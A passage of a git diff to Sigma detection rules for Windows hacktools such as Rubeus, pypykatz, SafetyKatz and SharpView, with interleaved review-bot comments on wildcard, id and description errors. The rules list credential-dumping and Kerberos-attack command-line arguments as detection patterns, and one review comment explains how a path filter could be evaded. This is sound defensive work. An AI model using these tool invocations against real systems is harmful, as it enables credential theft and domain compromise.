0479f44df47cfa2ef1ccc4416a538663 condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml index 51d0c89c9..444d72502 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml 
@@ -31,11 +31,11 @@ detection: - \powershell.exe - \pwsh.exe Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - /Create - powershell.exe -NonI - /TN Updater /TR - CommandLine|contains: + CommandLine|contains: - /SC ONLOGON - /SC DAILY /ST - /SC ONIDLE diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_powertool.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_powertool.yml index 2e0089a41..5fca7216b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_powertool.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_powertool.yml @@ -1,9 +1,7 @@ title: HackTool - PowerTool Execution id: a34f79a3-8e5f-4cc3-b765-de00695452c2 status: test -description: Detects the execution of the tool PowerTool which has the ability to - kill a process, delete its process file, unload drivers, and delete the driver - files +description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files references: - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ - https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html @@ -24,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \PowerTool.exe - - \PowerTool64.exe - - OriginalFileName: PowerTool.exe + - Image|endswith: + - \PowerTool.exe + - \PowerTool64.exe + - OriginalFileName: PowerTool.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml index a7eaf4ffd..326e93e55 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml @@ -19,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|contains: \purplesharp - - OriginalFileName: PurpleSharp.exe + - Image|contains: \purplesharp + - OriginalFileName: PurpleSharp.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - xyz123456.exe - PurpleSharp condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_pypykatz.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_pypykatz.yml index 8b6ae959a..6dc681005 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_pypykatz.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_pypykatz.yml @@ -1,9 +1,7 @@ title: HackTool - Pypykatz Credentials Dumping Activity id: a29808fd-ef50-49ff-9c7a-59a9b040b404 status: test -description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries - may attempt to extract credential material from the Security Account Manager (SAM) - database through Windows registry where the SAM database is stored +description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored references: - https://github.com/skelsec/pypykatz - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz @@ -25,7 +23,7 @@ detection: Image|endswith: - \pypykatz.exe - \python.exe - CommandLine|contains|all: + CommandLine|contains|all: - live - registry condition: process_creation and selection 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_quarks_pwdump.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_quarks_pwdump.yml index 4d95df9f0..19762dc07 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_quarks_pwdump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_quarks_pwdump.yml @@ -22,7 +22,7 @@ detection: selection_img: Image|endswith: \QuarksPwDump.exe selection_cli: - CommandLine: + CommandLine: - ' -dhl' - ' --dump-hash-local' - ' -dhdc' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml index 77bbd080c..9b5497181 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml @@ -1,8 +1,7 @@ title: HackTool - RedMimicry Winnti Playbook Execution id: 95022b85-ff2a-49fa-939a-d7b8f56eeb9b status: test -description: Detects actions caused by the RedMimicry Winnti playbook a automated - breach emulations utility +description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility references: - https://redmimicry.com/posts/redmimicry-winnti/ author: Alexander Rausch @@ -26,7 +25,7 @@ detection: Image|endswith: - \rundll32.exe - \cmd.exe - CommandLine|contains: + CommandLine|contains: - gthread-3.6.dll - \Windows\Temp\tmp.bat - sigcmm-2.4.dll diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml index 44c496032..b56393cbc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml 
@@ -1,8 +1,7 @@ title: Potential SMB Relay Attack Tool Execution id: 5589ab4f-a767-433c-961d-c91f3f704db1 status: test -description: Detects different hacktools used for relay attacks on Windows for privilege - escalation +description: Detects different hacktools used for relay attacks on Windows for privilege escalation references: - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ - https://pentestlab.blog/2017/04/13/hot-potato/ @@ -40,22 +39,22 @@ detection: - \ntlmrelayx - \LocalPotato selection_script: - CommandLine|contains: + CommandLine|contains: - Invoke-Tater - ' smbrelay' - ' ntlmrelay' - 'cme smb ' - ' /ntlm:NTLMhash ' - Invoke-PetitPotam - - '.exe -t * -p ' - selection_juicypotato_enum: - CommandLine|contains: .exe -c "{ - CommandLine|endswith: '}" -z' - filter_hotpotatoes: + - '.exe -t * -p ' # JuicyPotatoNG pattern https://github.com/antonioCoco/JuicyPotatoNG + selection_juicypotato_enum: # appears when JuicyPotatoNG is used with -b + CommandLine|contains: .exe -c "{ + CommandLine|endswith: '}" -z' + filter_hotpotatoes: # known goodware https://hotpot.uvic.ca/ Image|contains: - HotPotatoes6 - HotPotatoes7 - - 'HotPotatoes ' + - 'HotPotatoes ' # Covers the following: 'HotPotatoes 6', 'HotPotatoes 7', 'HotPotatoes Help', 'HotPotatoes Tutorial' condition: process_creation and (1 of selection_* and not 1 of filter_*) falsepositives: - Legitimate files with these rare hacktool names diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_rubeus.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_rubeus.yml index 1b86e9b45..6694755ac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_rubeus.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_rubeus.yml 
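Review bot: The value `'.exe -t * -p '` now annotated as the JuicyPotatoNG pattern contains a bare `*`, which Sigma treats as a wildcard, so it matches any `.exe -t <anything> -p ` rather than the literal asterisk that the tool's documented default invocation uses. If the literal is what is meant, escape it as `- '.exe -t \* -p '  # JuicyPotatoNG default "-t *" (literal asterisk)`; if the wildcard is deliberate, the comment should say so, because the current form is materially broader. The new `# known goodware` comment on `filter_hotpotatoes` should also note that the exclusion is a substring match on `Image`, so any binary whose path contains `HotPotatoes ` — a renamed hacktool or a staging folder named after the product — is excluded from every `selection_*` in this rule; something like `# Path-substring exclusion, attacker-controlled; pair with hash or signer checks where available` would make that explicit.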
@@ -1,11 +1,10 @@ title: HackTool - Rubeus Execution id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 related: - - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 - type: similar + - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 + type: similar status: stable -description: Detects the execution of the hacktool Rubeus via PE information of command - line parameters +description: Detects the execution of the hacktool Rubeus via PE information of command line parameters references: - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html @@ -28,25 +27,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \Rubeus.exe - - OriginalFileName: Rubeus.exe - - Description: Rubeus - - CommandLine|contains: - - 'asreproast ' - - 'dump /service:krbtgt ' - - dump /luid:0x - - 'kerberoast ' - - 'createnetonly /program:' - - 'ptt /ticket:' - - '/impersonateuser:' - - 'renew /ticket:' - - 'asktgt /user:' - - 'harvest /interval:' - - 's4u /user:' - - 's4u /ticket:' - - 'hash /password:' - - 'golden /aes256:' - - 'silver /user:' + - Image|endswith: \Rubeus.exe + - OriginalFileName: Rubeus.exe + - Description: Rubeus + - CommandLine|contains: + - 'asreproast ' + - 'dump /service:krbtgt ' + - dump /luid:0x + - 'kerberoast ' + - 'createnetonly /program:' + - 'ptt /ticket:' + - '/impersonateuser:' + - 'renew /ticket:' + - 'asktgt /user:' + - 'harvest /interval:' + - 's4u /user:' + - 's4u /ticket:' + - 'hash /password:' + - 'golden /aes256:' + - 'silver /user:' condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_safetykatz.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_safetykatz.yml index c8d834997..12a93202c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_safetykatz.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_safetykatz.yml 
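Review bot: The `related` entry in this hunk references `7ec2c172-dceb-4c10-92c9-87c1881b7e18`, which is the rule's own `id` two lines above, so the rule declares itself as its own `similar` counterpart. Either the entry should carry the id of the other Rubeus rule it is meant to pair with, or the `related` block should be dropped; which id was intended cannot be determined from this hunk. The reflowed description also reads `via PE information of command line parameters`, while the selection in the next hunk matches on PE metadata or command-line strings, so `description: Detects the execution of the hacktool Rubeus via PE information or command line parameters` appears to be what was meant.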
@@ -1,8 +1,7 @@ title: HackTool - SafetyKatz Execution id: b1876533-4ed5-4a83-90f3-b8645840a413 status: test -description: Detects the execution of the hacktool SafetyKatz via PE information and - default Image name +description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name references: - https://github.com/GhostPack/SafetyKatz author: Nasreddine Bencherchali (Nextron Systems) @@ -20,9 +19,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \SafetyKatz.exe - - OriginalFileName: SafetyKatz.exe - - Description: SafetyKatz + - Image|endswith: \SafetyKatz.exe + - OriginalFileName: SafetyKatz.exe + - Description: SafetyKatz condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_secutyxploded.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_secutyxploded.yml index 6c6a4e1d6..0a7924601 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_secutyxploded.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_secutyxploded.yml @@ -20,9 +20,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Company: SecurityXploded - - Image|endswith: PasswordDump.exe - - OriginalFileName|endswith: PasswordDump.exe + - Company: SecurityXploded + - Image|endswith: PasswordDump.exe + - OriginalFileName|endswith: PasswordDump.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_selectmyparent.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_selectmyparent.yml index 5cd024352..42b1263a5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_selectmyparent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_selectmyparent.yml 
@@ -1,8 +1,7 @@ title: HackTool - PPID Spoofing SelectMyParent Tool Execution id: 52ff7941-8211-46f9-84f8-9903efb7077d status: test -description: Detects the use of parent process ID spoofing tools like Didier Stevens - tool SelectMyParent +description: Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent references: - https://pentestlab.blog/2020/02/24/parent-pid-spoofing/ - https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks 
@@ -23,35 +22,35 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \SelectMyParent.exe - - CommandLine|contains: - - PPID-spoof - - ppid_spoof - - spoof-ppid - - spoof_ppid - - ppidspoof - - spoofppid - - spoofedppid - - ' -spawnto ' - - OriginalFileName|contains: - - PPID-spoof - - ppid_spoof - - spoof-ppid - - spoof_ppid - - ppidspoof - - spoofppid - - spoofedppid - - Description: SelectMyParent - - Imphash: - - 04d974875bd225f00902b4cad9af3fbc - - a782af154c9e743ddf3f3eb2b8f3d16e - - 89059503d7fbf470e68f7e63313da3ad - - ca28337632625c8281ab8a130b3d6bad - - Hashes|contains: - - IMPHASH=04D974875BD225F00902B4CAD9AF3FBC - - IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E - - IMPHASH=89059503D7FBF470E68F7E63313DA3AD - - IMPHASH=CA28337632625C8281AB8A130B3D6BAD + - Image|endswith: \SelectMyParent.exe + - CommandLine|contains: + - PPID-spoof + - ppid_spoof + - spoof-ppid + - spoof_ppid + - ppidspoof + - spoofppid + - spoofedppid + - ' -spawnto ' + - OriginalFileName|contains: + - PPID-spoof + - ppid_spoof + - spoof-ppid + - spoof_ppid + - ppidspoof + - spoofppid + - spoofedppid + - Description: SelectMyParent + - Imphash: + - 04d974875bd225f00902b4cad9af3fbc + - a782af154c9e743ddf3f3eb2b8f3d16e + - 89059503d7fbf470e68f7e63313da3ad + - ca28337632625c8281ab8a130b3d6bad + - Hashes|contains: + - IMPHASH=04D974875BD225F00902B4CAD9AF3FBC + - IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E + - IMPHASH=89059503D7FBF470E68F7E63313DA3AD + - IMPHASH=CA28337632625C8281AB8A130B3D6BAD condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_chisel.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_chisel.yml index ca4903016..c1aba014e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_chisel.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_chisel.yml 
@@ -1,8 +1,8 @@ title: HackTool - SharpChisel Execution id: cf93e05e-d798-4d9e-b522-b0248dc61eaf related: - - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 - type: similar + - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 + type: similar status: test description: Detects usage of the Sharp Chisel via the commandline arguments references: @@ -23,8 +23,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \SharpChisel.exe - - Product: SharpChisel + - Image|endswith: \SharpChisel.exe + - Product: SharpChisel + # See rule 8b0e12da-d3c3-49db-bb4f-256703f380e5 for Chisel.exe coverage condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_impersonation.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_impersonation.yml index a18c381ac..0e9a4e15a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_impersonation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_impersonation.yml @@ -1,11 +1,10 @@ title: HackTool - SharpImpersonation Execution id: f89b08d0-77ad-4728-817b-9b16c5a69c7a related: - - id: cf0c254b-22f1-4b2b-8221-e137b3c0af94 - type: similar + - id: cf0c254b-22f1-4b2b-8221-e137b3c0af94 + type: similar status: test -description: Detects execution of the SharpImpersonation tool. Which can be used to - manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively +description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively references: - https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/ - https://github.com/S3cur3Th1sSh1t/SharpImpersonation 
@@ -26,18 +25,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \SharpImpersonation.exe - - OriginalFileName: SharpImpersonation.exe + - Image|endswith: \SharpImpersonation.exe + - OriginalFileName: SharpImpersonation.exe selection_cli: - - CommandLine|contains|all: - - ' user:' - - ' binary:' - - CommandLine|contains|all: - - ' user:' - - ' shellcode:' - - CommandLine|contains: - - ' technique:CreateProcessAsUserW' - - ' technique:ImpersonateLoggedOnuser' + - CommandLine|contains|all: + - ' user:' + - ' binary:' + - CommandLine|contains|all: + - ' user:' + - ' shellcode:' + - CommandLine|contains: + - ' technique:CreateProcessAsUserW' + - ' technique:ImpersonateLoggedOnuser' condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml index 010e990ed..07f7c79f7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml @@ -1,8 +1,7 @@ title: HackTool - SharpLDAPmonitor Execution id: 9f8fc146-1d1a-4dbf-b8fd-dfae15e08541 status: test -description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, - deletion and changes to LDAP objects. +description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects. references: - https://github.com/p0dalirius/LDAPmonitor author: Nasreddine Bencherchali (Nextron Systems) 
@@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \SharpLDAPmonitor.exe - - OriginalFileName: SharpLDAPmonitor.exe + - Image|endswith: \SharpLDAPmonitor.exe + - OriginalFileName: SharpLDAPmonitor.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/user:' - '/pass:' - '/dcip:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpersist.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpersist.yml index 65a0f6090..bdf0c7a0a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpersist.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpersist.yml @@ -1,8 +1,7 @@ title: HackTool - SharPersist Execution id: 26488ad0-f9fd-4536-876f-52fea846a2e4 status: test -description: Detects the execution of the hacktool SharPersist - used to deploy various - different kinds of persistence mechanisms +description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms references: - https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit - https://github.com/mandiant/SharPersist @@ -21,22 +20,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \SharPersist.exe - - Product: SharPersist + - Image|endswith: \SharPersist.exe + - Product: SharPersist selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' -t schtask -c ' - ' -t startupfolder -c ' selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t reg -c ' - ' -m add' selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t service -c ' - ' -m add' selection_cli_4: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t schtask -c ' - ' -m add' condition: process_creation and (1 of selection_*) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpevtmute.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpevtmute.yml index 2f4820bd0..7d300aa1c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpevtmute.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpevtmute.yml @@ -1,11 +1,10 @@ title: HackTool - SharpEvtMute Execution id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c related: - - id: 49329257-089d-46e6-af37-4afce4290685 - type: similar + - id: 49329257-089d-46e6-af37-4afce4290685 # DLL load + type: similar status: test -description: Detects the use of SharpEvtHook, a tool that tampers with the Windows - event logs +description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs references: - https://github.com/bats3c/EvtMute author: Florian Roth (Nextron Systems) @@ -23,11 +22,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \SharpEvtMute.exe - - Description: SharpEvtMute - - CommandLine|contains: - - '--Filter "rule ' - - --Encoded --Filter \" + - Image|endswith: \SharpEvtMute.exe + - Description: SharpEvtMute + - CommandLine|contains: + - '--Filter "rule ' + - --Encoded --Filter \" condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml index 3c52fbb5e..a9b246cf2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml 
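Review bot: The reflowed description still says `Detects the use of SharpEvtHook`, while the title, the `Image|endswith: \SharpEvtMute.exe` selection in the second hunk and the bats3c/EvtMute reference all name the tool SharpEvtMute, so the description appears to carry the wrong tool name. Suggest `description: Detects the use of SharpEvtMute, a tool that tampers with the Windows event logs`. The new `# DLL load` annotation on the related id would be clearer if it named what it means, e.g. `# image_load variant of this detection`, provided that is what rule 49329257-089d-46e6-af37-4afce4290685 covers.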
@@ -1,8 +1,7 @@ title: HackTool - SharpLdapWhoami Execution id: d9367cbb-c2e0-47ce-bdc0-128cb6da898d status: test -description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service - on a domain controller +description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller references: - https://github.com/bugch3ck/SharpLdapWhoami author: Florian Roth (Nextron Systems) @@ -22,11 +21,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_name: Image|endswith: \SharpLdapWhoami.exe - selection_pe: - - OriginalFileName|contains: SharpLdapWhoami - - Product: SharpLdapWhoami + selection_pe: # in case the file has been renamed after compilation + - OriginalFileName|contains: SharpLdapWhoami + - Product: SharpLdapWhoami selection_flags1: - CommandLine|endswith: + CommandLine|endswith: - ' /method:ntlm' - ' /method:kerb' - ' /method:nego' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpup.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpup.yml index 42f8902ad..ac285a4c4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpup.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpup.yml @@ -21,16 +21,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \SharpUp.exe - - Description: SharpUp - - CommandLine|contains: - - HijackablePaths - - UnquotedServicePath - - ProcessDLLHijack - - ModifiableServiceBinaries - - ModifiableScheduledTask - - DomainGPPPassword - - CachedGPPPassword + - Image|endswith: \SharpUp.exe + - Description: SharpUp + - CommandLine|contains: + - HijackablePaths + - UnquotedServicePath + - ProcessDLLHijack + - ModifiableServiceBinaries + - ModifiableScheduledTask + - DomainGPPPassword + - CachedGPPPassword condition: process_creation and selection falsepositives: - Unknown 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpview.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpview.yml index 1c223a878..9fd0eee77 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpview.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpview.yml @@ -1,11 +1,10 @@ title: HackTool - SharpView Execution id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d related: - - id: dcd74b95-3f36-4ed9-9598-0490951643aa - type: similar + - id: dcd74b95-3f36-4ed9-9598-0490951643aa + type: similar status: test -description: Adversaries may look for details about the network configuration and - settings of systems they access or through information discovery of remote systems +description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems references: - https://github.com/tevora-threat/SharpView/ - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 
@@ -29,91 +28,117 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: SharpView.exe - - Image|endswith: \SharpView.exe - - CommandLine|contains: - - Add-RemoteConnection - - Convert-ADName - - ConvertFrom-SID - - ConvertFrom-UACValue - - Convert-SidToName - - Export-PowerViewCSV - - Find-DomainObjectPropertyOutlier - - Find-DomainProcess - - Find-DomainShare - - Find-DomainUserEvent - - Find-DomainUserLocation - - Find-ForeignGroup - - Find-ForeignUser - - Find-GPOComputerAdmin - - Find-GPOLocation - - Find-Interesting - - Find-LocalAdminAccess - - Find-ManagedSecurityGroups - - Get-CachedRDPConnection - - Get-DFSshare - - Get-DomainComputer - - Get-DomainController - - Get-DomainDFSShare - - Get-DomainDNSRecord - - Get-DomainFileServer - - Get-DomainForeign - - Get-DomainGPO - - Get-DomainGroup - - Get-DomainGUIDMap - - Get-DomainManagedSecurityGroup - - Get-DomainObject - - Get-DomainOU - - Get-DomainPolicy - - Get-DomainSID - - Get-DomainSite - - Get-DomainSPNTicket - - Get-DomainSubnet - - Get-DomainTrust - - Get-DomainUserEvent - - Get-ForestDomain - - Get-ForestGlobalCatalog - - Get-ForestTrust - - Get-GptTmpl - - Get-GroupsXML - - Get-LastLoggedOn - - Get-LoggedOnLocal - - Get-NetComputer - - Get-NetDomain - - Get-NetFileServer - - Get-NetForest - - Get-NetGPO - - Get-NetGroupMember - - Get-NetLocalGroup - - Get-NetLoggedon - - Get-NetOU - - Get-NetProcess - - Get-NetRDPSession - - Get-NetSession - - Get-NetShare - - Get-NetSite - - Get-NetSubnet - - Get-NetUser - - Get-PathAcl - - Get-PrincipalContext - - Get-RegistryMountedDrive - - Get-RegLoggedOn - - Get-WMIRegCachedRDPConnection - - Get-WMIRegLastLoggedOn - - Get-WMIRegMountedDrive - - Get-WMIRegProxy - - Invoke-ACLScanner - - Invoke-CheckLocalAdminAccess - - Invoke-Kerberoast - - Invoke-MapDomainTrust - - Invoke-RevertToSelf - - Invoke-Sharefinder - - Invoke-UserImpersonation - - Remove-DomainObjectAcl - - Remove-RemoteConnection - - Request-SPNTicket 
- - Set-DomainObject - - Test-AdminAccess + - OriginalFileName: SharpView.exe + - Image|endswith: \SharpView.exe + - CommandLine|contains: + # - 'Add-DomainGroupMember' + # - 'Add-DomainObjectAcl' + # - 'Add-ObjectAcl' + - Add-RemoteConnection + - Convert-ADName + - ConvertFrom-SID + - ConvertFrom-UACValue + - Convert-SidToName + # - 'ConvertTo-SID' + - Export-PowerViewCSV + # - 'Find-DomainLocalGroupMember' + - Find-DomainObjectPropertyOutlier + - Find-DomainProcess + - Find-DomainShare + - Find-DomainUserEvent + - Find-DomainUserLocation + - Find-ForeignGroup + - Find-ForeignUser + - Find-GPOComputerAdmin + - Find-GPOLocation + - Find-Interesting # 'Find-InterestingDomainAcl', 'Find-InterestingDomainShareFile', 'Find-InterestingFile' + - Find-LocalAdminAccess + - Find-ManagedSecurityGroups + # - 'Get-ADObject' + - Get-CachedRDPConnection + - Get-DFSshare + # - 'Get-DNSRecord' + # - 'Get-DNSZone' + # - 'Get-Domain' + - Get-DomainComputer + - Get-DomainController + - Get-DomainDFSShare + - Get-DomainDNSRecord + # - 'Get-DomainDNSZone' + - Get-DomainFileServer + - Get-DomainForeign # 'Get-DomainForeignGroupMember', 'Get-DomainForeignUser' + - Get-DomainGPO # 'Get-DomainGPOComputerLocalGroupMapping', 'Get-DomainGPOLocalGroup', 'Get-DomainGPOUserLocalGroupMapping' + - Get-DomainGroup # 'Get-DomainGroupMember' + - Get-DomainGUIDMap + - Get-DomainManagedSecurityGroup + - Get-DomainObject # 'Get-DomainObjectAcl' + - Get-DomainOU + - Get-DomainPolicy # 'Get-DomainPolicyData' + - Get-DomainSID + - Get-DomainSite + - Get-DomainSPNTicket + - Get-DomainSubnet + - Get-DomainTrust # 'Get-DomainTrustMapping' + # - 'Get-DomainUser' + - Get-DomainUserEvent + # - 'Get-Forest' + - Get-ForestDomain + - Get-ForestGlobalCatalog + - Get-ForestTrust + - Get-GptTmpl + - Get-GroupsXML + # - 'Get-GUIDMap' + # - 'Get-IniContent' + # - 'Get-IPAddress' + - Get-LastLoggedOn + - Get-LoggedOnLocal + - Get-NetComputer # 'Get-NetComputerSiteName' + - Get-NetDomain # 'Get-NetDomainController', 
